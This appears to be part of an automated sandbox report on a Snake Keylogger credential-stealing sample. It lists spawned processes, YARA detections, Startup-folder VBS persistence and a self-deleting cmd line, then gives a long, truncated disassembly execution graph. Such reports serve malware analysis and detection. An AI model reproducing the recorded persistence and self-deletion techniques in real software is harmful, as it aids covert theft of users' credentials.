                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe"
                                                                      Imagebase:0x7ff75ecb0000
                                                                      File size:1'663'264 bytes
                                                                      MD5 hash:5EFEF6CC9CD24BAEEED71C1107FC32DF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 0%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:6
                                                                      Start time:10:46:51
                                                                      Start date:10/01/2025
                                                                      Path:C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe"
                                                                      Imagebase:0xd20000
                                                                      File size:134'144 bytes
                                                                      MD5 hash:099EB488DBC2288AB41C4EF64EA7DBA4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2304736561.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: Joe Security
                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: Joe Security
                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: Joe Security
                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: unknown
                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: Florian Roth
                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: ditekSHen
                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:7
                                                                      Start time:10:47:00
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\System32\wscript.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs"
                                                                      Imagebase:0x7ff6b5290000
                                                                      File size:170'496 bytes
                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:8
                                                                      Start time:10:47:00
                                                                      Start date:10/01/2025
                                                                      Path:C:\Users\user\AppData\Local\konked\lecheries.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\konked\lecheries.exe"
                                                                      Imagebase:0xb60000
                                                                      File size:2'382'336 bytes
                                                                      MD5 hash:A031DA4BAE8BD9CF87C071C94F67D21B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:9
                                                                      Start time:10:47:02
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\konked\lecheries.exe"
                                                                      Imagebase:0xaf0000
                                                                      File size:45'984 bytes
                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:11
                                                                      Start time:10:47:03
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff66e660000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:12
                                                                      Start time:10:47:03
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe"
                                                                      Imagebase:0x1c0000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:13
                                                                      Start time:10:47:04
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff66e660000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:14
                                                                      Start time:10:47:04
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:choice /C Y /N /D Y /T 3
                                                                      Imagebase:0xc20000
                                                                      File size:28'160 bytes
                                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:17
                                                                      Start time:10:47:13
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\System32\notepad.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\error_log.txt
                                                                      Imagebase:0x7ff6a0030000
                                                                      File size:201'216 bytes
                                                                      MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:3%
                                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                                        Signature Coverage:4.3%
                                                                        Total number of Nodes:2000
                                                                        Total number of Limit Nodes:88
                                                                        execution_graph 101238 89e5ab 101241 89d100 101238->101241 101240 89e5b9 101242 89d11d 101241->101242 101270 89d37d 101241->101270 101243 8d2691 101242->101243 101244 8d26e0 101242->101244 101273 89d144 101242->101273 101247 8d2694 101243->101247 101249 8d26af 101243->101249 101313 90a3e6 282 API calls __cinit 101244->101313 101248 8d26a0 101247->101248 101247->101273 101311 90a9fa 282 API calls 101248->101311 101249->101270 101312 90aea2 282 API calls 3 library calls 101249->101312 101253 89d434 101302 898a52 68 API calls 101253->101302 101254 8d28b5 101254->101254 101255 89d54b 101255->101240 101259 89d443 101259->101240 101260 8d27fc 101321 90a751 66 API calls 101260->101321 101270->101255 101322 8f9e4a 66 API calls 3 library calls 101270->101322 101273->101253 101273->101255 101273->101260 101273->101270 101275 899ea0 101273->101275 101299 898740 68 API calls __cinit 101273->101299 101300 898542 68 API calls 101273->101300 101301 8984c0 69 API calls 101273->101301 101303 89843a 68 API calls 101273->101303 101304 89cf7c 282 API calls 101273->101304 101305 899dda 59 API calls Mailbox 101273->101305 101306 8b2d40 101273->101306 101309 89cf00 66 API calls 101273->101309 101310 89cd7d 282 API calls 101273->101310 101314 898a52 68 API calls 101273->101314 101315 899d3c 60 API calls Mailbox 101273->101315 101316 8e678d 60 API calls 101273->101316 101317 898047 101273->101317 101276 899ebf 101275->101276 101294 899eed Mailbox 101275->101294 101323 8b0db6 101276->101323 101278 89b475 101279 898047 59 API calls 101278->101279 101293 89a057 101279->101293 101280 8e6e8f 59 API calls 101280->101294 101281 89b47a 101282 8d0055 101281->101282 101297 8d09e5 101281->101297 101335 8f9e4a 66 API calls 3 library calls 101282->101335 101283 897667 59 API calls 101283->101294 101286 8b0db6 59 API calls Mailbox 101286->101294 101288 8d0064 101288->101273 101289 8b2d40 67 API calls __cinit 101289->101294 101291 898047 59 API calls 101291->101294 101293->101273 101294->101278 101294->101280 101294->101281 101294->101282 101294->101283 101294->101286 101294->101289 101294->101291 101294->101293 101295 8d09d6 101294->101295 101298 89a55a 101294->101298 101333 89c8c0 282 API calls 2 library calls 101294->101333 101334 89b900 60 API calls Mailbox 101294->101334 101337 8f9e4a 66 API calls 3 library calls 101295->101337 101338 8f9e4a 66 API calls 3 library calls 101297->101338 101336 8f9e4a 66 API calls 3 library calls 101298->101336 101299->101273 101300->101273 101301->101273 101302->101259 101303->101273 101304->101273 101305->101273 101367 8b2c44 101306->101367 101308 8b2d4b 101308->101273 101309->101273 101310->101273 101311->101255 101312->101270 101313->101273 101314->101273 101315->101273 101316->101273 101318 89805a 101317->101318 101319 898052 101317->101319 101318->101273 101408 897f77 59 API calls 2 library calls 101319->101408 101321->101270 101322->101254 101326 8b0dbe 101323->101326 101325 8b0dd8 101325->101294 101326->101325 101328 8b0ddc std::exception::exception 101326->101328 101339 8b571c 101326->101339 101356 8b33a1 DecodePointer 101326->101356 101357 8b859b RaiseException 101328->101357 101330 8b0e06 101358 8b84d1 58 API calls _free 101330->101358 101332 8b0e18 101332->101294 101333->101294 101334->101294 101335->101288 101336->101293 101337->101297 101338->101293 101340 8b5797 101339->101340 101344 8b5728 101339->101344 101365 8b33a1 DecodePointer 101340->101365 101342 8b579d 101366 8b8b28 58 API calls __getptd_noexit 101342->101366 101343 8b5733 101343->101344 101359 8ba16b 58 API calls 2 library calls 101343->101359 101360 8ba1c8 58 API calls 6 library calls 101343->101360 101361 8b309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101343->101361 101344->101343 101347 8b575b RtlAllocateHeap 101344->101347 101350 8b5783 101344->101350 101354 8b5781 101344->101354 101362 8b33a1 DecodePointer 101344->101362 101347->101344 101348 8b578f 101347->101348 101348->101326 101363 8b8b28 58 API calls __getptd_noexit 101350->101363 101364 8b8b28 58 API calls __getptd_noexit 101354->101364 101356->101326 101357->101330 101358->101332 101359->101343 101360->101343 101362->101344 101363->101354 101364->101348 101365->101342 101366->101348 101368 8b2c50 __setmode 101367->101368 101375 8b3217 101368->101375 101374 8b2c77 __setmode 101374->101308 101392 8b9c0b 101375->101392 101377 8b2c59 101378 8b2c88 DecodePointer DecodePointer 101377->101378 101379 8b2c65 101378->101379 101380 8b2cb5 101378->101380 101389 8b2c82 101379->101389 101380->101379 101401 8b87a4 59 API calls __cftof_l 101380->101401 101382 8b2d18 EncodePointer EncodePointer 101382->101379 101383 8b2cec 101383->101379 101387 8b2d06 EncodePointer 101383->101387 101403 8b8864 61 API calls 2 library calls 101383->101403 101384 8b2cc7 101384->101382 101384->101383 101402 8b8864 61 API calls 2 library calls 101384->101402 101387->101382 101388 8b2d00 101388->101379 101388->101387 101404 8b3220 101389->101404 101393 8b9c2f EnterCriticalSection 101392->101393 101394 8b9c1c 101392->101394 101393->101377 101399 8b9c93 58 API calls 9 library calls 101394->101399 101396 8b9c22 101396->101393 101400 8b30b5 58 API calls 3 library calls 101396->101400 101399->101396 101401->101384 101402->101383 101403->101388 101407 8b9d75 LeaveCriticalSection 101404->101407 101406 8b2c87 101406->101374 101407->101406 101408->101318 101409 8c7dce 101410 8c7ddd 101409->101410 101411 8c7da7 101409->101411 101419 8c7e22 LeaveCriticalSection __unlock_fhandle 101410->101419 101417 8b8b28 58 API calls __getptd_noexit 101411->101417 101413 8c7dac 101418 8b8db6 9 API calls __cftof_l 101413->101418 101416 8c7db6 __setmode 101417->101413 101418->101416 101419->101416 101420 89552a 101427 895ab8 101420->101427 101426 89555a Mailbox 101428 8b0db6 Mailbox 59 API calls 101427->101428 101429 895acb 101428->101429 101430 8b0db6 Mailbox 59 API calls 101429->101430 101431 89553c 101430->101431 101432 8954d2 101431->101432 101446 8958cf 101432->101446 101435 895514 101435->101426 101438 898061 MultiByteToWideChar 101435->101438 101436 8954e3 101436->101435 101453 895bc0 101436->101453 101459 895a7a 101436->101459 101439 8980ce 101438->101439 101440 898087 101438->101440 101488 897d8c 101439->101488 101442 8b0db6 Mailbox 59 API calls 101440->101442 101443 89809c MultiByteToWideChar 101442->101443 101476 89774d 101443->101476 101445 8980c0 101445->101426 101447 8cdc3c 101446->101447 101448 8958e0 101446->101448 101468 8e5ecd 59 API calls Mailbox 101447->101468 101448->101436 101450 8cdc46 101451 8b0db6 Mailbox 59 API calls 101450->101451 101452 8cdc52 101451->101452 101454 895c33 101453->101454 101458 895bce 101453->101458 101469 895c4e SetFilePointerEx 101454->101469 101455 895bf6 101455->101436 101457 895c06 ReadFile 101457->101455 101457->101458 101458->101455 101458->101457 101460 8cdcee 101459->101460 101461 895a8e 101459->101461 101475 8e5ecd 59 API calls Mailbox 101460->101475 101470 8959b9 101461->101470 101464 895a9a 101464->101436 101465 8cdcf9 101466 8b0db6 Mailbox 59 API calls 101465->101466 101467 8cdd0e _memmove 101466->101467 101468->101450 101469->101458 101471 8959d1 101470->101471 101474 8959ca _memmove 101470->101474 101472 8cdc7e 101471->101472 101473 8b0db6 Mailbox 59 API calls 101471->101473 101473->101474 101474->101464 101475->101465 101477 89775c 101476->101477 101478 8977cf 101476->101478 101477->101478 101480 897768 101477->101480 101496 897d2c 101478->101496 101481 8977a0 101480->101481 101482 897772 101480->101482 101493 898029 101481->101493 101492 897f27 59 API calls Mailbox 101482->101492 101485 89777a _memmove 101485->101445 101486 8977aa 101487 8b0db6 Mailbox 59 API calls 101486->101487 101487->101485 101489 897da6 101488->101489 101491 897d99 101488->101491 101490 8b0db6 Mailbox 59 API calls 101489->101490 101490->101491 101491->101445 101492->101485 101494 8b0db6 Mailbox 59 API calls 101493->101494 101495 898033 101494->101495 101495->101486 101497 897d43 _memmove 101496->101497 101498 897d3a 101496->101498 101497->101485 101498->101497 101500 897e4f 101498->101500 101501 897e62 101500->101501 101503 897e5f _memmove 101500->101503 101502 8b0db6 Mailbox 59 API calls 101501->101502 101502->101503 101503->101497 101504 8f89a9 101505 8b571c __crtGetStringTypeA_stat 58 API calls 101504->101505 101506 8f89b8 101505->101506 101507 8b571c __crtGetStringTypeA_stat 58 API calls 101506->101507 101508 8f89cc 101507->101508 101509 8b571c __crtGetStringTypeA_stat 58 API calls 101508->101509 101510 8f89e0 101509->101510 101512 8f89f3 101510->101512 101513 8f8d0d 101510->101513 101514 8f8d1a 101513->101514 101515 8f8d20 101513->101515 101521 8b2d55 101514->101521 101517 8b2d55 _free 58 API calls 101515->101517 101518 8f8d31 101515->101518 101517->101518 101519 8f8d43 101518->101519 101520 8b2d55 _free 58 API calls 101518->101520 101519->101512 101520->101519 101522 8b2d87 __dosmaperr 101521->101522 101523 8b2d5e RtlFreeHeap 101521->101523 101522->101515 101523->101522 101524 8b2d73 101523->101524 101527 8b8b28 58 API calls __getptd_noexit 101524->101527 101526 8b2d79 GetLastError 101526->101522 101527->101526 101528 8c80ab 101529 8c80ec GetLastError 101528->101529 101530 8c80bb 101528->101530 101550 8b8b07 58 API calls 2 library calls 101529->101550 101530->101529 101544 8c7cfd 101530->101544 101533 8c8111 101551 8b8b28 58 API calls __getptd_noexit 101533->101551 101536 8c811e GetFileType 101538 8c8129 GetLastError 101536->101538 101537 8c8117 101552 8b8b07 58 API calls 2 library calls 101538->101552 101540 8c8150 CloseHandle 101540->101533 101541 8c815e 101540->101541 101553 8b8b28 58 API calls __getptd_noexit 101541->101553 101543 8c8163 101543->101533 101545 8c7d08 ___crtIsPackagedApp 101544->101545 101546 8c7d0c GetModuleHandleW GetProcAddress 101545->101546 101547 8c7d63 CreateFileW 101545->101547 101548 8c7d29 101546->101548 101549 8c7d81 101547->101549 101548->101549 101549->101529 101549->101536 101550->101533 101551->101537 101552->101540 101553->101543 101554 8f8c02 101555 8f8d0d 58 API calls 101554->101555 101556 8f8c09 101555->101556 101557 8f8c16 101556->101557 101561 8b53a6 101556->101561 101559 8b53a6 __fcloseall 65 API calls 101557->101559 101560 8f8c24 101557->101560 101559->101560 101562 8b53b2 __setmode 101561->101562 101563 8b53de 101562->101563 101564 8b53c6 101562->101564 101570 8b53d6 __setmode 101563->101570 101574 8b6c11 101563->101574 101596 8b8b28 58 API calls __getptd_noexit 101564->101596 101566 8b53cb 101597 8b8db6 9 API calls __cftof_l 101566->101597 101570->101557 101575 8b6c43 EnterCriticalSection 101574->101575 101576 8b6c21 101574->101576 101578 8b53f0 101575->101578 101576->101575 101577 8b6c29 101576->101577 101579 8b9c0b __lock 58 API calls 101577->101579 101580 8b533a 101578->101580 101579->101578 101581 8b5349 101580->101581 101582 8b535d 101580->101582 101642 8b8b28 58 API calls __getptd_noexit 101581->101642 101594 8b5359 101582->101594 101599 8b4a3d 101582->101599 101584 8b534e 101643 8b8db6 9 API calls __cftof_l 101584->101643 101591 8b5377 101616 8c0a02 101591->101616 101593 8b537d 101593->101594 101595 8b2d55 _free 58 API calls 101593->101595 101598 8b5415 LeaveCriticalSection LeaveCriticalSection _fprintf 101594->101598 101595->101594 101596->101566 101597->101570 101598->101570 101600 8b4a50 101599->101600 101604 8b4a74 101599->101604 101601 8b46e6 __filbuf 58 API calls 101600->101601 101600->101604 101602 8b4a6d 101601->101602 101644 8bd886 101602->101644 101605 8c0b77 101604->101605 101606 8c0b84 101605->101606 101608 8b5371 101605->101608 101607 8b2d55 _free 58 API calls 101606->101607 101606->101608 101607->101608 101609 8b46e6 101608->101609 101610 8b46f0 101609->101610 101611 8b4705 101609->101611 101689 8b8b28 58 API calls __getptd_noexit 101610->101689 101611->101591 101613 8b46f5 101690 8b8db6 9 API calls __cftof_l 101613->101690 101615 8b4700 101615->101591 101617 8c0a0e __setmode 101616->101617 101618 8c0a1b 101617->101618 101619 8c0a32 101617->101619 101706 8b8af4 58 API calls __getptd_noexit 101618->101706 101621 8c0abd 101619->101621 101623 8c0a42 101619->101623 101711 8b8af4 58 API calls __getptd_noexit 101621->101711 101622 8c0a20 101707 8b8b28 58 API calls __getptd_noexit 101622->101707 101626 8c0a6a 101623->101626 101627 8c0a60 101623->101627 101629 8bd206 ___lock_fhandle 59 API calls 101626->101629 101708 8b8af4 58 API calls __getptd_noexit 101627->101708 101628 8c0a65 101712 8b8b28 58 API calls __getptd_noexit 101628->101712 101632 8c0a70 101629->101632 101634 8c0a8e 101632->101634 101635 8c0a83 101632->101635 101633 8c0ac9 101713 8b8db6 9 API calls __cftof_l 101633->101713 101709 8b8b28 58 API calls __getptd_noexit 101634->101709 101691 8c0add 101635->101691 101638 8c0a27 __setmode 101638->101593 101640 8c0a89 101710 8c0ab5 LeaveCriticalSection __unlock_fhandle 101640->101710 101642->101584 101643->101594 101645 8bd892 __setmode 101644->101645 101646 8bd89f 101645->101646 101647 8bd8b6 101645->101647 101678 8b8af4 58 API calls __getptd_noexit 101646->101678 101649 8bd955 101647->101649 101651 8bd8ca 101647->101651 101684 8b8af4 58 API calls __getptd_noexit 101649->101684 101650 8bd8a4 101679 8b8b28 58 API calls __getptd_noexit 101650->101679 101654 8bd8e8 101651->101654 101655 8bd8f2 101651->101655 101680 8b8af4 58 API calls __getptd_noexit 101654->101680 101669 8bd206 101655->101669 101656 8bd8ed 101685 8b8b28 58 API calls __getptd_noexit 101656->101685 101657 8bd8ab __setmode 101657->101604 101660 8bd8f8 101667 8bd90b 101660->101667 101681 8b8b28 58 API calls __getptd_noexit 101660->101681 101662 8bd961 101686 8b8db6 9 API calls __cftof_l 101662->101686 101665 8bd923 101682 8b8af4 58 API calls __getptd_noexit 101665->101682 101683 8bd94d LeaveCriticalSection __unlock_fhandle 101667->101683 101670 8bd212 __setmode 101669->101670 101671 8bd261 EnterCriticalSection 101670->101671 101672 8b9c0b __lock 58 API calls 101670->101672 101673 8bd287 __setmode 101671->101673 101674 8bd237 101672->101674 101673->101660 101675 8bd24f 101674->101675 101687 8b9e2b InitializeCriticalSectionAndSpinCount 101674->101687 101688 8bd28b LeaveCriticalSection _doexit 101675->101688 101678->101650 101679->101657 101680->101656 101681->101665 101682->101667 101683->101657 101684->101656 101685->101662 101686->101657 101687->101675 101688->101671 101689->101613 101690->101615 101714 8bd4c3 101691->101714 101693 8c0b41 101727 8bd43d 59 API calls 2 library calls 101693->101727 101695 8c0aeb 101695->101693 101696 8c0b1f 101695->101696 101697 8bd4c3 __lseeki64_nolock 58 API calls 101695->101697 101696->101693 101698 8bd4c3 __lseeki64_nolock 58 API calls 101696->101698 101700 8c0b16 101697->101700 101701 8c0b2b CloseHandle 101698->101701 101699 8c0b49 101702 8c0b6b 101699->101702 101728 8b8b07 58 API calls 2 library calls 101699->101728 101703 8bd4c3 __lseeki64_nolock 58 API calls 101700->101703 101701->101693 101704 8c0b37 GetLastError 101701->101704 101702->101640 101703->101696 101704->101693 101706->101622 101707->101638 101708->101628 101709->101640 101710->101638 101711->101628 101712->101633 101713->101638 101715 8bd4ce 101714->101715 101716 8bd4e3 101714->101716 101729 8b8af4 58 API calls __getptd_noexit 101715->101729 101722 8bd508 101716->101722 101731 8b8af4 58 API calls __getptd_noexit 101716->101731 101719 8bd4d3 101730 8b8b28 58 API calls __getptd_noexit 101719->101730 101720 8bd512 101732 8b8b28 58 API calls __getptd_noexit 101720->101732 101722->101695 101724 8bd51a 101733 8b8db6 9 API calls __cftof_l 101724->101733 101725 8bd4db 101725->101695 101727->101699 101728->101702 101729->101719 101730->101725 101731->101720 101732->101724 101733->101725 101734 8b4826 101735 8b4776 _memmove 101734->101735 101736 8b4739 101734->101736 101735->101736 101737 8b4a3d __flush 60 API calls 101735->101737 101738 8b46e6 __filbuf 58 API calls 101735->101738 101739 8bd886 __write 60 API calls 101735->101739 101737->101735 101738->101735 101739->101735 101740 891066 101745 89f76f 101740->101745 101742 89106c 101743 8b2d40 __cinit 67 API calls 101742->101743 101744 891076 101743->101744 101746 89f790 101745->101746 101778 8aff03 101746->101778 101750 89f7d7 101788 897667 101750->101788 101753 897667 59 API calls 101754 89f7eb 101753->101754 101755 897667 59 API calls 101754->101755 101756 89f7f5 101755->101756 101757 897667 59 API calls 101756->101757 101758 89f833 101757->101758 101759 897667 59 API calls 101758->101759 101760 89f8fe 101759->101760 101793 8a5f87 101760->101793 101764 89f930 101765 897667 59 API calls 101764->101765 101766 89f93a 101765->101766 101821 8afd9e 101766->101821 101768 89f981 101769 89f991 GetStdHandle 101768->101769 101770 89f9dd 101769->101770 101771 8d45ab 101769->101771 101772 89f9e5 OleInitialize 101770->101772 101771->101770 101773 8d45b4 101771->101773 101772->101742 101828 8f6b38 64 API calls Mailbox 101773->101828 101775 8d45bb 101829 8f7207 CreateThread 101775->101829 101777 8d45c7 CloseHandle 101777->101772 101830 8affdc 101778->101830 101781 8affdc 59 API calls 101782 8aff45 101781->101782 101783 897667 59 API calls 101782->101783 101784 8aff51 101783->101784 101837 897bcc 101784->101837 101786 89f796 101787 8b0162 6 API calls 101786->101787 101787->101750 101789 8b0db6 Mailbox 59 API calls 101788->101789 101790 897688 101789->101790 101791 8b0db6 Mailbox 59 API calls 101790->101791 101792 897696 101791->101792 101792->101753 101794 897667 59 API calls 101793->101794 101795 8a5f97 101794->101795 101796 897667 59 API calls 101795->101796 101797 8a5f9f 101796->101797 101847 8a5a9d 101797->101847 101800 8a5a9d 59 API calls 101801 8a5faf 101800->101801 101802 897667 59 API calls 101801->101802 101803 8a5fba 101802->101803 101804 8b0db6 Mailbox 59 API calls 101803->101804 101805 89f908 101804->101805 101806 8a60f9 101805->101806 101807 8a6107 101806->101807 101808 897667 59 API calls 101807->101808 101809 8a6112 101808->101809 101810 897667 59 API calls 101809->101810 101811 8a611d 101810->101811 101812 897667 59 API calls 101811->101812 101813 8a6128 101812->101813 101814 897667 59 API calls 101813->101814 101815 8a6133 101814->101815 101816 8a5a9d 59 API calls 101815->101816 101817 8a613e 101816->101817 101818 8b0db6 Mailbox 59 API calls 101817->101818 101819 8a6145 RegisterWindowMessageW 101818->101819 101819->101764 101822 8e576f 101821->101822 101823 8afdae 101821->101823 101850 8f9ae7 60 API calls 101822->101850 101825 8b0db6 Mailbox 59 API calls 101823->101825 101827 8afdb6 101825->101827 101826 8e577a 101827->101768 101828->101775 101829->101777 101851 8f71ed 65 API calls 101829->101851 101831 897667 59 API calls 101830->101831 101832 8affe7 101831->101832 101833 897667 59 API calls 101832->101833 101834 8affef 101833->101834 101835 897667 59 API calls 101834->101835 101836 8aff3b 101835->101836 101836->101781 101838 897bd8 __NMSG_WRITE 101837->101838 101839 897c45 101837->101839 101841 897bee 101838->101841 101842 897c13 101838->101842 101840 897d2c 59 API calls 101839->101840 101845 897bf6 _memmove 101840->101845 101846 897f27 59 API calls Mailbox 101841->101846 101844 898029 59 API calls 101842->101844 101844->101845 101845->101786 101846->101845 101848 897667 59 API calls 101847->101848 101849 8a5aa5 101848->101849 101849->101800 101850->101826 101852 8cfdfc 101857 89ab30 Mailbox _memmove 101852->101857 101854 8e617e Mailbox 59 API calls 101875 89a057 101854->101875 101856 8b0db6 59 API calls Mailbox 101856->101857 101857->101856 101859 89b525 101857->101859 101864 899f37 Mailbox 101857->101864 101857->101875 101886 89b2b6 101857->101886 101888 899ea0 282 API calls 101857->101888 101889 8d086a 101857->101889 101891 8d0878 101857->101891 101893 8d085c 101857->101893 101894 89b21c 101857->101894 101898 8e6e8f 59 API calls 101857->101898 101902 8fd07b 101857->101902 101945 90df23 101857->101945 101948 8a1fc3 101857->101948 101981 90c2e0 101857->101981 102013 8f7956 101857->102013 102019 897de1 101857->102019 102023 90bc6b 101857->102023 102063 8e617e 101857->102063 102068 899c90 59 API calls Mailbox 101857->102068 102072 90c193 60 API calls 2 library calls 101857->102072 102074 8f9e4a 66 API calls 3 library calls 101859->102074 101861 8b0db6 59 API calls Mailbox 101861->101864 101862 8d09e5 102079 8f9e4a 66 API calls 3 library calls 101862->102079 101863 8d0055 102073 8f9e4a 66 API calls 3 library calls 101863->102073 101864->101861 101864->101863 101868 89b475 101864->101868 101870 89b47a 101864->101870 101864->101875 101876 898047 59 API calls 101864->101876 101877 897667 59 API calls 101864->101877 101878 8e6e8f 59 API calls 101864->101878 101879 8b2d40 67 API calls __cinit 101864->101879 101881 8d09d6 101864->101881 101884 89a55a 101864->101884 102066 89c8c0 282 API calls 2 library calls 101864->102066 102067 89b900 60 API calls Mailbox 101864->102067 101872 898047 59 API calls 101868->101872 101869 